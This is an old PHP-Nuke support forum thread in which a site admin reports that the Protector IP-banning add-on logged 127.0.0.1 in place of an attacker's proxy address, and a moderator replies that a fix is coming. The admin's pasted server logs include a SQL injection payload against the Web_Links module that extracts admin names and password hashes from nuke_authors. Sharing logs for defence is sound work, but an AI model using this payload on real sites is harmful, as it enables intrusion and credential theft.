You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 78 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Hole in Protector IP banning system?! [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

Hole in Protector IP banning system?!
 
This forum is locked: you cannot post, reply to, or edit topics.  This topic is locked: you cannot edit posts or make replies.printer-friendly view Nuke Cops Forum Index » Protector
View previous topic Log in to check your private messages View next topic
Author Message
poptech
Nuke Soldier
Nuke Soldier


Joined: Feb 06, 2003
Posts: 22

Location: EU
PostPosted: Tue Mar 30, 2004 8:48 am Reply with quoteBack to top
Here is what was recorded on one of my sites a couple hours ago:

The problem was that Protector recoded intruder coming from IP 127.0.0.1 and his actual IP as proxy 209.210.176.21!!!

Protector keeps banning IP 127.0.0.1 three times in a row, but intruder was able to continue!

As a matter of fact, Protector failed to record other proxy 209.210.176.33.

From server log file:
Code:
209.210.176.33 - - [30/Mar/2004:07:25:09 -0500] "GET /modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/* HTTP/1.0" 200 5495 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; Feat Ext 18)"

209.210.176.21 - - [30/Mar/2004:07:25:18 -0500] "GET /themes/rbw/images/pixel.gif HTTP/1.0" 200 43 "/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; Feat Ext 18)"

209.210.176.33 - - [30/Mar/2004:07:25:29 -0500] "GET /modules/Web_Links/images/link-logo.gif HTTP/1.0" 200 3399 "/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; Feat Ext 18)"

209.210.176.33 - - [30/Mar/2004:07:25:37 -0500] "GET /modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/**** HTTP/1.0" 200 5494 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; Feat Ext 18)"


The attempt was not successful, but due to some other changes I made to the Nuke it self!

I banned this proxy IP, but somehow not feeling safe. I guess they are very pissed right now.

If you want to see who I am fighting, check this post:
Al Qaeda attacks Serbian site
http://nukecops.com/postt25609.html[/b]
Find all posts by poptechView user's profileSend private messageVisit poster's website
MisterWORK
Support Mod
Support Mod


Joined: Jun 11, 2003
Posts: 245
PostPosted: Tue Mar 30, 2004 11:24 am Reply with quoteBack to top
Yes i know and this is fixed in next release.. all internal ip like 192.168.0.0-192.168.255.255 and 127.0.0.1 is NOT logged anymore Wink

_________________
Protector System for phpNuke.
<b>Current Version Released: 1.15.b2( 05/12-04) </b>
Support site: http://protector.warcenter.se
Find all posts by MisterWORKView user's profileSend private messageSend e-mailVisit poster's website
poptech
Nuke Soldier
Nuke Soldier


Joined: Feb 06, 2003
Posts: 22

Location: EU
PostPosted: Tue Mar 30, 2004 12:43 pm Reply with quoteBack to top
MisterWORK wrote:
Yes i know and this is fixed in next release.. all internal ip like 192.168.0.0-192.168.255.255 and 127.0.0.1 is NOT logged anymore Wink


Good, impatiently aviating next release!!!

For other reading this post: I'm using Protector 1.14.b2 and Nuke 7.2
Find all posts by poptechView user's profileSend private messageVisit poster's website
Display posts from previous:      
This forum is locked: you cannot post, reply to, or edit topics.  This topic is locked: you cannot edit posts or make replies.printer-friendly view Nuke Cops Forum Index » Protector
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.183 Seconds - 320 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::